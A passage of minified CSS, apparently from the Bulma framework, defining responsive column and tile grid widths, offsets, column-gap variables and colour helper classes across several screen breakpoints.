ffset-two-thirds{margin-left:66.6666%}.columns.is-mobile>.column.is-offset-half{margin-left:50%}.columns.is-mobile>.column.is-offset-one-third{margin-left:33.3333%}.columns.is-mobile>.column.is-offset-one-quarter{margin-left:25%}.columns.is-mobile>.column.is-offset-one-fifth{margin-left:20%}.columns.is-mobile>.column.is-offset-two-fifths{margin-left:40%}.columns.is-mobile>.column.is-offset-three-fifths{margin-left:60%}.columns.is-mobile>.column.is-offset-four-fifths{margin-left:80%}.columns.is-mobile>.column.is-0{flex:none;width:0%}.columns.is-mobile>.column.is-offset-0{margin-left:0%}.columns.is-mobile>.column.is-1{flex:none;width:8.33333%}.columns.is-mobile>.column.is-offset-1{margin-left:8.33333%}.columns.is-mobile>.column.is-2{flex:none;width:16.66667%}.columns.is-mobile>.column.is-offset-2{margin-left:16.66667%}.columns.is-mobile>.column.is-3{flex:none;width:25%}.columns.is-mobile>.column.is-offset-3{margin-left:25%}.columns.is-mobile>.column.is-4{flex:none;width:33.33333%}.columns.is-mobile>.column.is-offset-4{margin-left:33.33333%}.columns.is-mobile>.column.is-5{flex:none;width:41.66667%}.columns.is-mobile>.column.is-offset-5{margin-left:41.66667%}.columns.is-mobile>.column.is-6{flex:none;width:50%}.columns.is-mobile>.column.is-offset-6{margin-left:50%}.columns.is-mobile>.column.is-7{flex:none;width:58.33333%}.columns.is-mobile>.column.is-offset-7{margin-left:58.33333%}.columns.is-mobile>.column.is-8{flex:none;width:66.66667%}.columns.is-mobile>.column.is-offset-8{margin-left:66.66667%}.columns.is-mobile>.column.is-9{flex:none;width:75%}.columns.is-mobile>.column.is-offset-9{margin-left:75%}.columns.is-mobile>.column.is-10{flex:none;width:83.33333%}.columns.is-mobile>.column.is-offset-10{margin-left:83.33333%}.columns.is-mobile>.column.is-11{flex:none;width:91.66667%}.columns.is-mobile>.column.is-offset-11{margin-left:91.66667%}.columns.is-mobile>.column.is-12{flex:none;width:100%}.columns.is-mobile>.column.is-offset-12{margin-left:100%}@media screen and (max-width: 768px){.column.is-narrow-mobile{flex:none;width:unset}.column.is-full-mobile{flex:none;width:100%}.column.is-three-quarters-mobile{flex:none;width:75%}.column.is-two-thirds-mobile{flex:none;width:66.6666%}.column.is-half-mobile{flex:none;width:50%}.column.is-one-third-mobile{flex:none;width:33.3333%}.column.is-one-quarter-mobile{flex:none;width:25%}.column.is-one-fifth-mobile{flex:none;width:20%}.column.is-two-fifths-mobile{flex:none;width:40%}.column.is-three-fifths-mobile{flex:none;width:60%}.column.is-four-fifths-mobile{flex:none;width:80%}.column.is-offset-three-quarters-mobile{margin-left:75%}.column.is-offset-two-thirds-mobile{margin-left:66.6666%}.column.is-offset-half-mobile{margin-left:50%}.column.is-offset-one-third-mobile{margin-left:33.3333%}.column.is-offset-one-quarter-mobile{margin-left:25%}.column.is-offset-one-fifth-mobile{margin-left:20%}.column.is-offset-two-fifths-mobile{margin-left:40%}.column.is-offset-three-fifths-mobile{margin-left:60%}.column.is-offset-four-fifths-mobile{margin-left:80%}.column.is-0-mobile{flex:none;width:0%}.column.is-offset-0-mobile{margin-left:0%}.column.is-1-mobile{flex:none;width:8.33333%}.column.is-offset-1-mobile{margin-left:8.33333%}.column.is-2-mobile{flex:none;width:16.66667%}.column.is-offset-2-mobile{margin-left:16.66667%}.column.is-3-mobile{flex:none;width:25%}.column.is-offset-3-mobile{margin-left:25%}.column.is-4-mobile{flex:none;width:33.33333%}.column.is-offset-4-mobile{margin-left:33.33333%}.column.is-5-mobile{flex:none;width:41.66667%}.column.is-offset-5-mobile{margin-left:41.66667%}.column.is-6-mobile{flex:none;width:50%}.column.is-offset-6-mobile{margin-left:50%}.column.is-7-mobile{flex:none;width:58.33333%}.column.is-offset-7-mobile{margin-left:58.33333%}.column.is-8-mobile{flex:none;width:66.66667%}.column.is-offset-8-mobile{margin-left:66.66667%}.column.is-9-mobile{flex:none;width:75%}.column.is-offset-9-mobile{margin-left:75%}.column.is-10-mobile{flex:none;width:83.33333%}.column.is-offset-10-mobile{margin-left:83.33333%}.column.is-11-mobile{flex:none;width:91.66667%}.column.is-offset-11-mobile{margin-left:91.66667%}.column.is-12-mobile{flex:none;width:100%}.column.is-offset-12-mobile{margin-left:100%}}@media screen and (min-width: 769px),print{.column.is-narrow,.column.is-narrow-tablet{flex:none;width:unset}.column.is-full,.column.is-full-tablet{flex:none;width:100%}.column.is-three-quarters,.column.is-three-quarters-tablet{flex:none;width:75%}.column.is-two-thirds,.column.is-two-thirds-tablet{flex:none;width:66.6666%}.column.is-half,.column.is-half-tablet{flex:none;width:50%}.column.is-one-third,.column.is-one-third-tablet{flex:none;width:33.3333%}.column.is-one-quarter,.column.is-one-quarter-tablet{flex:none;width:25%}.column.is-one-fifth,.column.is-one-fifth-tablet{flex:none;width:20%}.column.is-two-fifths,.column.is-two-fifths-tablet{flex:none;width:40%}.column.is-three-fifths,.column.is-three-fifths-tablet{flex:none;width:60%}.column.is-four-fifths,.column.is-four-fifths-tablet{flex:none;width:80%}.column.is-offset-three-quarters,.column.is-offset-three-quarters-tablet{margin-left:75%}.column.is-offset-two-thirds,.column.is-offset-two-thirds-tablet{margin-left:66.6666%}.column.is-offset-half,.column.is-offset-half-tablet{margin-left:50%}.column.is-offset-one-third,.column.is-offset-one-third-tablet{margin-left:33.3333%}.column.is-offset-one-quarter,.column.is-offset-one-quarter-tablet{margin-left:25%}.column.is-offset-one-fifth,.column.is-offset-one-fifth-tablet{margin-left:20%}.column.is-offset-two-fifths,.column.is-offset-two-fifths-tablet{margin-left:40%}.column.is-offset-three-fifths,.column.is-offset-three-fifths-tablet{margin-left:60%}.column.is-offset-four-fifths,.column.is-offset-four-fifths-tablet{margin-left:80%}.column.is-0,.column.is-0-tablet{flex:none;width:0%}.column.is-offset-0,.column.is-offset-0-tablet{margin-left:0%}.column.is-1,.column.is-1-tablet{flex:none;width:8.33333%}.column.is-offset-1,.column.is-offset-1-tablet{margin-left:8.33333%}.column.is-2,.column.is-2-tablet{flex:none;width:16.66667%}.column.is-offset-2,.column.is-offset-2-tablet{margin-left:16.66667%}.column.is-3,.column.is-3-tablet{flex:none;width:25%}.column.is-offset-3,.column.is-offset-3-tablet{margin-left:25%}.column.is-4,.column.is-4-tablet{flex:none;width:33.33333%}.column.is-offset-4,.column.is-offset-4-tablet{margin-left:33.33333%}.column.is-5,.column.is-5-tablet{flex:none;width:41.66667%}.column.is-offset-5,.column.is-offset-5-tablet{margin-left:41.66667%}.column.is-6,.column.is-6-tablet{flex:none;width:50%}.column.is-offset-6,.column.is-offset-6-tablet{margin-left:50%}.column.is-7,.column.is-7-tablet{flex:none;width:58.33333%}.column.is-offset-7,.column.is-offset-7-tablet{margin-left:58.33333%}.column.is-8,.column.is-8-tablet{flex:none;width:66.66667%}.column.is-offset-8,.column.is-offset-8-tablet{margin-left:66.66667%}.column.is-9,.column.is-9-tablet{flex:none;width:75%}.column.is-offset-9,.column.is-offset-9-tablet{margin-left:75%}.column.is-10,.column.is-10-tablet{flex:none;width:83.33333%}.column.is-offset-10,.column.is-offset-10-tablet{margin-left:83.33333%}.column.is-11,.column.is-11-tablet{flex:none;width:91.66667%}.column.is-offset-11,.column.is-offset-11-tablet{margin-left:91.66667%}.column.is-12,.column.is-12-tablet{flex:none;width:100%}.column.is-offset-12,.column.is-offset-12-tablet{margin-left:100%}}@media screen and (max-width: 1023px){.column.is-narrow-touch{flex:none;width:unset}.column.is-full-touch{flex:none;width:100%}.column.is-three-quarters-touch{flex:none;width:75%}.column.is-two-thirds-touch{flex:none;width:66.6666%}.column.is-half-touch{flex:none;width:50%}.column.is-one-third-touch{flex:none;width:33.3333%}.column.is-one-quarter-touch{flex:none;width:25%}.column.is-one-fifth-touch{flex:none;width:20%}.column.is-two-fifths-touch{flex:none;width:40%}.column.is-three-fifths-touch{flex:none;width:60%}.column.is-four-fifths-touch{flex:none;width:80%}.column.is-offset-three-quarters-touch{margin-left:75%}.column.is-offset-two-thirds-touch{margin-left:66.6666%}.column.is-offset-half-touch{margin-left:50%}.column.is-offset-one-third-touch{margin-left:33.3333%}.column.is-offset-one-quarter-touch{margin-left:25%}.column.is-offset-one-fifth-touch{margin-left:20%}.column.is-offset-two-fifths-touch{margin-left:40%}.column.is-offset-three-fifths-touch{margin-left:60%}.column.is-offset-four-fifths-touch{margin-left:80%}.column.is-0-touch{flex:none;width:0%}.column.is-offset-0-touch{margin-left:0%}.column.is-1-touch{flex:none;width:8.33333%}.column.is-offset-1-touch{margin-left:8.33333%}.column.is-2-touch{flex:none;width:16.66667%}.column.is-offset-2-touch{margin-left:16.66667%}.column.is-3-touch{flex:none;width:25%}.column.is-offset-3-touch{margin-left:25%}.column.is-4-touch{flex:none;width:33.33333%}.column.is-offset-4-touch{margin-left:33.33333%}.column.is-5-touch{flex:none;width:41.66667%}.column.is-offset-5-touch{margin-left:41.66667%}.column.is-6-touch{flex:none;width:50%}.column.is-offset-6-touch{margin-left:50%}.column.is-7-touch{flex:none;width:58.33333%}.column.is-offset-7-touch{margin-left:58.33333%}.column.is-8-touch{flex:none;width:66.66667%}.column.is-offset-8-touch{margin-left:66.66667%}.column.is-9-touch{flex:none;width:75%}.column.is-offset-9-touch{margin-left:75%}.column.is-10-touch{flex:none;width:83.33333%}.column.is-offset-10-touch{margin-left:83.33333%}.column.is-11-touch{flex:none;width:91.66667%}.column.is-offset-11-touch{margin-left:91.66667%}.column.is-12-touch{flex:none;width:100%}.column.is-offset-12-touch{margin-left:100%}}@media screen and (min-width: 1024px){.column.is-narrow-desktop{flex:none;width:unset}.column.is-full-desktop{flex:none;width:100%}.column.is-three-quarters-desktop{flex:none;width:75%}.column.is-two-thirds-desktop{flex:none;width:66.6666%}.column.is-half-desktop{flex:none;width:50%}.column.is-one-third-desktop{flex:none;width:33.3333%}.column.is-one-quarter-desktop{flex:none;width:25%}.column.is-one-fifth-desktop{flex:none;width:20%}.column.is-two-fifths-desktop{flex:none;width:40%}.column.is-three-fifths-desktop{flex:none;width:60%}.column.is-four-fifths-desktop{flex:none;width:80%}.column.is-offset-three-quarters-desktop{margin-left:75%}.column.is-offset-two-thirds-desktop{margin-left:66.6666%}.column.is-offset-half-desktop{margin-left:50%}.column.is-offset-one-third-desktop{margin-left:33.3333%}.column.is-offset-one-quarter-desktop{margin-left:25%}.column.is-offset-one-fifth-desktop{margin-left:20%}.column.is-offset-two-fifths-desktop{margin-left:40%}.column.is-offset-three-fifths-desktop{margin-left:60%}.column.is-offset-four-fifths-desktop{margin-left:80%}.column.is-0-desktop{flex:none;width:0%}.column.is-offset-0-desktop{margin-left:0%}.column.is-1-desktop{flex:none;width:8.33333%}.column.is-offset-1-desktop{margin-left:8.33333%}.column.is-2-desktop{flex:none;width:16.66667%}.column.is-offset-2-desktop{margin-left:16.66667%}.column.is-3-desktop{flex:none;width:25%}.column.is-offset-3-desktop{margin-left:25%}.column.is-4-desktop{flex:none;width:33.33333%}.column.is-offset-4-desktop{margin-left:33.33333%}.column.is-5-desktop{flex:none;width:41.66667%}.column.is-offset-5-desktop{margin-left:41.66667%}.column.is-6-desktop{flex:none;width:50%}.column.is-offset-6-desktop{margin-left:50%}.column.is-7-desktop{flex:none;width:58.33333%}.column.is-offset-7-desktop{margin-left:58.33333%}.column.is-8-desktop{flex:none;width:66.66667%}.column.is-offset-8-desktop{margin-left:66.66667%}.column.is-9-desktop{flex:none;width:75%}.column.is-offset-9-desktop{margin-left:75%}.column.is-10-desktop{flex:none;width:83.33333%}.column.is-offset-10-desktop{margin-left:83.33333%}.column.is-11-desktop{flex:none;width:91.66667%}.column.is-offset-11-desktop{margin-left:91.66667%}.column.is-12-desktop{flex:none;width:100%}.column.is-offset-12-desktop{margin-left:100%}}@media screen and (min-width: 1216px){.column.is-narrow-widescreen{flex:none;width:unset}.column.is-full-widescreen{flex:none;width:100%}.column.is-three-quarters-widescreen{flex:none;width:75%}.column.is-two-thirds-widescreen{flex:none;width:66.6666%}.column.is-half-widescreen{flex:none;width:50%}.column.is-one-third-widescreen{flex:none;width:33.3333%}.column.is-one-quarter-widescreen{flex:none;width:25%}.column.is-one-fifth-widescreen{flex:none;width:20%}.column.is-two-fifths-widescreen{flex:none;width:40%}.column.is-three-fifths-widescreen{flex:none;width:60%}.column.is-four-fifths-widescreen{flex:none;width:80%}.column.is-offset-three-quarters-widescreen{margin-left:75%}.column.is-offset-two-thirds-widescreen{margin-left:66.6666%}.column.is-offset-half-widescreen{margin-left:50%}.column.is-offset-one-third-widescreen{margin-left:33.3333%}.column.is-offset-one-quarter-widescreen{margin-left:25%}.column.is-offset-one-fifth-widescreen{margin-left:20%}.column.is-offset-two-fifths-widescreen{margin-left:40%}.column.is-offset-three-fifths-widescreen{margin-left:60%}.column.is-offset-four-fifths-widescreen{margin-left:80%}.column.is-0-widescreen{flex:none;width:0%}.column.is-offset-0-widescreen{margin-left:0%}.column.is-1-widescreen{flex:none;width:8.33333%}.column.is-offset-1-widescreen{margin-left:8.33333%}.column.is-2-widescreen{flex:none;width:16.66667%}.column.is-offset-2-widescreen{margin-left:16.66667%}.column.is-3-widescreen{flex:none;width:25%}.column.is-offset-3-widescreen{margin-left:25%}.column.is-4-widescreen{flex:none;width:33.33333%}.column.is-offset-4-widescreen{margin-left:33.33333%}.column.is-5-widescreen{flex:none;width:41.66667%}.column.is-offset-5-widescreen{margin-left:41.66667%}.column.is-6-widescreen{flex:none;width:50%}.column.is-offset-6-widescreen{margin-left:50%}.column.is-7-widescreen{flex:none;width:58.33333%}.column.is-offset-7-widescreen{margin-left:58.33333%}.column.is-8-widescreen{flex:none;width:66.66667%}.column.is-offset-8-widescreen{margin-left:66.66667%}.column.is-9-widescreen{flex:none;width:75%}.column.is-offset-9-widescreen{margin-left:75%}.column.is-10-widescreen{flex:none;width:83.33333%}.column.is-offset-10-widescreen{margin-left:83.33333%}.column.is-11-widescreen{flex:none;width:91.66667%}.column.is-offset-11-widescreen{margin-left:91.66667%}.column.is-12-widescreen{flex:none;width:100%}.column.is-offset-12-widescreen{margin-left:100%}}@media screen and (min-width: 1408px){.column.is-narrow-fullhd{flex:none;width:unset}.column.is-full-fullhd{flex:none;width:100%}.column.is-three-quarters-fullhd{flex:none;width:75%}.column.is-two-thirds-fullhd{flex:none;width:66.6666%}.column.is-half-fullhd{flex:none;width:50%}.column.is-one-third-fullhd{flex:none;width:33.3333%}.column.is-one-quarter-fullhd{flex:none;width:25%}.column.is-one-fifth-fullhd{flex:none;width:20%}.column.is-two-fifths-fullhd{flex:none;width:40%}.column.is-three-fifths-fullhd{flex:none;width:60%}.column.is-four-fifths-fullhd{flex:none;width:80%}.column.is-offset-three-quarters-fullhd{margin-left:75%}.column.is-offset-two-thirds-fullhd{margin-left:66.6666%}.column.is-offset-half-fullhd{margin-left:50%}.column.is-offset-one-third-fullhd{margin-left:33.3333%}.column.is-offset-one-quarter-fullhd{margin-left:25%}.column.is-offset-one-fifth-fullhd{margin-left:20%}.column.is-offset-two-fifths-fullhd{margin-left:40%}.column.is-offset-three-fifths-fullhd{margin-left:60%}.column.is-offset-four-fifths-fullhd{margin-left:80%}.column.is-0-fullhd{flex:none;width:0%}.column.is-offset-0-fullhd{margin-left:0%}.column.is-1-fullhd{flex:none;width:8.33333%}.column.is-offset-1-fullhd{margin-left:8.33333%}.column.is-2-fullhd{flex:none;width:16.66667%}.column.is-offset-2-fullhd{margin-left:16.66667%}.column.is-3-fullhd{flex:none;width:25%}.column.is-offset-3-fullhd{margin-left:25%}.column.is-4-fullhd{flex:none;width:33.33333%}.column.is-offset-4-fullhd{margin-left:33.33333%}.column.is-5-fullhd{flex:none;width:41.66667%}.column.is-offset-5-fullhd{margin-left:41.66667%}.column.is-6-fullhd{flex:none;width:50%}.column.is-offset-6-fullhd{margin-left:50%}.column.is-7-fullhd{flex:none;width:58.33333%}.column.is-offset-7-fullhd{margin-left:58.33333%}.column.is-8-fullhd{flex:none;width:66.66667%}.column.is-offset-8-fullhd{margin-left:66.66667%}.column.is-9-fullhd{flex:none;width:75%}.column.is-offset-9-fullhd{margin-left:75%}.column.is-10-fullhd{flex:none;width:83.33333%}.column.is-offset-10-fullhd{margin-left:83.33333%}.column.is-11-fullhd{flex:none;width:91.66667%}.column.is-offset-11-fullhd{margin-left:91.66667%}.column.is-12-fullhd{flex:none;width:100%}.column.is-offset-12-fullhd{margin-left:100%}}.columns{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.columns:last-child{margin-bottom:-.75rem}.columns:not(:last-child){margin-bottom:.75rem}.columns.is-centered{justify-content:center}.columns.is-gapless{margin-left:0;margin-right:0;margin-top:0}.columns.is-gapless>.column{margin:0;padding:0!important}.columns.is-gapless:not(:last-child){margin-bottom:1.5rem}.columns.is-gapless:last-child{margin-bottom:0}.columns.is-mobile{display:flex}.columns.is-multiline{flex-wrap:wrap}.columns.is-vcentered{align-items:center}@media screen and (min-width: 769px),print{.columns:not(.is-desktop){display:flex}}@media screen and (min-width: 1024px){.columns.is-desktop{display:flex}}.columns.is-variable{--columnGap: .75rem;margin-left:calc(-1 * var(--columnGap));margin-right:calc(-1 * var(--columnGap))}.columns.is-variable>.column{padding-left:var(--columnGap);padding-right:var(--columnGap)}.columns.is-variable.is-0{--columnGap: 0rem}@media screen and (max-width: 768px){.columns.is-variable.is-0-mobile{--columnGap: 0rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-0-tablet{--columnGap: 0rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-0-tablet-only{--columnGap: 0rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-0-touch{--columnGap: 0rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-0-desktop{--columnGap: 0rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-0-desktop-only{--columnGap: 0rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-0-widescreen{--columnGap: 0rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-0-widescreen-only{--columnGap: 0rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-0-fullhd{--columnGap: 0rem}}.columns.is-variable.is-1{--columnGap: .25rem}@media screen and (max-width: 768px){.columns.is-variable.is-1-mobile{--columnGap: .25rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-1-tablet{--columnGap: .25rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-1-tablet-only{--columnGap: .25rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-1-touch{--columnGap: .25rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-1-desktop{--columnGap: .25rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-1-desktop-only{--columnGap: .25rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-1-widescreen{--columnGap: .25rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-1-widescreen-only{--columnGap: .25rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-1-fullhd{--columnGap: .25rem}}.columns.is-variable.is-2{--columnGap: .5rem}@media screen and (max-width: 768px){.columns.is-variable.is-2-mobile{--columnGap: .5rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-2-tablet{--columnGap: .5rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-2-tablet-only{--columnGap: .5rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-2-touch{--columnGap: .5rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-2-desktop{--columnGap: .5rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-2-desktop-only{--columnGap: .5rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-2-widescreen{--columnGap: .5rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-2-widescreen-only{--columnGap: .5rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-2-fullhd{--columnGap: .5rem}}.columns.is-variable.is-3{--columnGap: .75rem}@media screen and (max-width: 768px){.columns.is-variable.is-3-mobile{--columnGap: .75rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-3-tablet{--columnGap: .75rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-3-tablet-only{--columnGap: .75rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-3-touch{--columnGap: .75rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-3-desktop{--columnGap: .75rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-3-desktop-only{--columnGap: .75rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-3-widescreen{--columnGap: .75rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-3-widescreen-only{--columnGap: .75rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-3-fullhd{--columnGap: .75rem}}.columns.is-variable.is-4{--columnGap: 1rem}@media screen and (max-width: 768px){.columns.is-variable.is-4-mobile{--columnGap: 1rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-4-tablet{--columnGap: 1rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-4-tablet-only{--columnGap: 1rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-4-touch{--columnGap: 1rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-4-desktop{--columnGap: 1rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-4-desktop-only{--columnGap: 1rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-4-widescreen{--columnGap: 1rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-4-widescreen-only{--columnGap: 1rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-4-fullhd{--columnGap: 1rem}}.columns.is-variable.is-5{--columnGap: 1.25rem}@media screen and (max-width: 768px){.columns.is-variable.is-5-mobile{--columnGap: 1.25rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-5-tablet{--columnGap: 1.25rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-5-tablet-only{--columnGap: 1.25rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-5-touch{--columnGap: 1.25rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-5-desktop{--columnGap: 1.25rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-5-desktop-only{--columnGap: 1.25rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-5-widescreen{--columnGap: 1.25rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-5-widescreen-only{--columnGap: 1.25rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-5-fullhd{--columnGap: 1.25rem}}.columns.is-variable.is-6{--columnGap: 1.5rem}@media screen and (max-width: 768px){.columns.is-variable.is-6-mobile{--columnGap: 1.5rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-6-tablet{--columnGap: 1.5rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-6-tablet-only{--columnGap: 1.5rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-6-touch{--columnGap: 1.5rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-6-desktop{--columnGap: 1.5rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-6-desktop-only{--columnGap: 1.5rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-6-widescreen{--columnGap: 1.5rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-6-widescreen-only{--columnGap: 1.5rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-6-fullhd{--columnGap: 1.5rem}}.columns.is-variable.is-7{--columnGap: 1.75rem}@media screen and (max-width: 768px){.columns.is-variable.is-7-mobile{--columnGap: 1.75rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-7-tablet{--columnGap: 1.75rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-7-tablet-only{--columnGap: 1.75rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-7-touch{--columnGap: 1.75rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-7-desktop{--columnGap: 1.75rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-7-desktop-only{--columnGap: 1.75rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-7-widescreen{--columnGap: 1.75rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-7-widescreen-only{--columnGap: 1.75rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-7-fullhd{--columnGap: 1.75rem}}.columns.is-variable.is-8{--columnGap: 2rem}@media screen and (max-width: 768px){.columns.is-variable.is-8-mobile{--columnGap: 2rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-8-tablet{--columnGap: 2rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-8-tablet-only{--columnGap: 2rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-8-touch{--columnGap: 2rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-8-desktop{--columnGap: 2rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-8-desktop-only{--columnGap: 2rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-8-widescreen{--columnGap: 2rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-8-widescreen-only{--columnGap: 2rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-8-fullhd{--columnGap: 2rem}}.tile{align-items:stretch;display:block;flex-basis:0;flex-grow:1;flex-shrink:1;min-height:-webkit-min-content;min-height:-moz-min-content;min-height:min-content}.tile.is-ancestor{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.tile.is-ancestor:last-child{margin-bottom:-.75rem}.tile.is-ancestor:not(:last-child){margin-bottom:.75rem}.tile.is-child{margin:0!important}.tile.is-parent{padding:.75rem}.tile.is-vertical{flex-direction:column}.tile.is-vertical>.tile.is-child:not(:last-child){margin-bottom:1.5rem!important}@media screen and (min-width: 769px),print{.tile:not(.is-child){display:flex}.tile.is-1{flex:none;width:8.33333%}.tile.is-2{flex:none;width:16.66667%}.tile.is-3{flex:none;width:25%}.tile.is-4{flex:none;width:33.33333%}.tile.is-5{flex:none;width:41.66667%}.tile.is-6{flex:none;width:50%}.tile.is-7{flex:none;width:58.33333%}.tile.is-8{flex:none;width:66.66667%}.tile.is-9{flex:none;width:75%}.tile.is-10{flex:none;width:83.33333%}.tile.is-11{flex:none;width:91.66667%}.tile.is-12{flex:none;width:100%}}.has-text-white{color:#fff!important}a.has-text-white:hover,a.has-text-white:focus{color:#e6e6e6!important}.has-background-white{background-color:#fff!important}.has-text-black{color:#0a0a0a!important}a.has-text-black:hover,a.has-text-black:focus{color:#000!important}.has-background-black{background-color:#0a0a0a!important}.has-text-light{color:#f5f5f5!important}a.has-text-light:hover,a.has-text-light:focus{color:#dbdbdb!important}.has-background-light{background-color:#f5f5f5!important}.has-text-dark{color:#363636!important}a.has-text-dark:hover,a.has-text-dark:focus{color:#1c1c1c!important}.has-background-dark{background-color:#363636!important}.has-text-primary{color:#00d1b2!important}a.has-text-primary:hover,a.has-text-primary:focus{color:#009e86!important}.has-background-primary{background-color:#00d1b2!important}.has-text-primary-light{color:#ebfffc!important}a.has-text-primary-light:hover,a.has-text-primary-light:focus{color:#b8fff4!important}.has-background-primary-light{background-color:#ebfffc!important}.has-text-primary-dark{color:#00947e!important}a.has-text-primary-dark:hover,a.has-text-primary-dark:focus{color:#00c7a9!important}.has-background-primary-dark{background-color:#00947e!important}.has-text-link{color:#485fc7!important}a.has-text-link:hover,a.has-text-link:focus{color:#3449a8!important}.has-background-link{background-color:#485fc7!important}.has-text-link-light{color:#eff1fa!important}a.has-text-link-light:hover,a.has-text-link-light:focus{color:#c8cfee!important}.has-background-link-light{background-color:#eff1fa!important}.has-text-link-dark{color:#3850b7!important}a.has-text-link-dark:hover,a.has-text-link-dark:focus{color:#576dcb!important}.has-background-link-dark{background-color:#3850b7!important}.has-text-info{color:#3e8ed0!important}a.has-text-info:hover,a.has-text-info:focus{color:#2b74b1!important}.has-background-info{background-color:#3e8ed0!important}.has-text-info-light{color:#eff5fb!important}a.has-text-info-light:hover,a.has-text-info-light:focus{color:#c6ddf1!important}.has-background-info-light{background-color:#eff5fb!important}.has-text-info-dark{color:#296fa8!important}a.has-text-info-dark:hover,a.has-text-info-dark:focus{color:#368ace!important}.has-background-info-dark{background-color:#296fa8!important}.has-text-success{color:#48c78e!important}a.has-text-success:hover,a.has-text-success:focus{color:#34a873!important}.has-background-success{background-color:#48c78e!important}.has-text-success-light{color:#effaf5!important}a.has-text-success-light:hover,a.has-text-success-light:focus{color:#c8eedd!important}.has-background-success-light{background-color:#effaf5!important}.has-text-success-dark{color:#257953!important}a.has-text-success-dark:hover,a.has-text-success-dark:focus{color:#31a06e!important}.has-background-success-dark{background-color:#257953!important}.has-text-warning{color:#ffe08a!important}a.has-text-warning:hover,a.has-text-warning:focus{color:#ffd257!important}.has-background-warning{background-color:#ffe08a!important}.has-text-warning-light{color:#fffaeb!important}a.has-text-warning-light:hover,a.has-text-warning-light:focus{color:#ffecb8!important}.has-background-warning-light{background-color:#fffaeb!important}.has-text-warning-dark{color:#946c00!important}a.has-text-warning-dark:hover,a.has-text-warning-dark:focus{color:#c79200!important}.has-background-warning-dark{background-color:#946c00!important}.has-text-danger{color:#f14668!important}a.has-text-danger:hover,a.has-text-danger:focus{color:#ee1742!important}.has-background-danger{background-color:#f14668!important}.has-text-danger-light{color:#feecf0!important}a.has-text-danger-light:hover,a.has-text-danger-light:focus{color:#fabdc9!important}.has-background-danger-light{background-color:#